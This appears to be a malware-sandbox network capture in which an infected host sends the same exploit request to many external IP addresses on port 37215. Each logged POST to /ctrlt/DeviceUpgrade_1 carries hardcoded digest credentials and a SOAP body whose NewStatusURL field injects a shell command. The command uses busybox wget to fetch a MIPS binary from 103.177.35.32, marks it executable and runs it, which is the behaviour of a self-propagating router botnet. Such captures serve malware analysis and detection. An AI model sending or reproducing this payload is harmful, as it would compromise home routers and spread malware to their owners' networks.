                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        823192.168.2.233449641.74.41.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487864971 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        824192.168.2.2336930189.203.142.12437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487899065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        825192.168.2.2348590142.76.27.23737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487951994 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        826192.168.2.2339162197.30.245.15737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487953901 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        827192.168.2.2340802157.52.116.25237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487967014 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        828192.168.2.2341768157.147.128.9537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487976074 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        829192.168.2.2337834197.33.212.14737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487982035 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        830192.168.2.235781041.224.92.8037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.487989902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        831192.168.2.2342542157.148.199.3437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488075018 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        832192.168.2.234811641.136.90.7637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.488086939 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
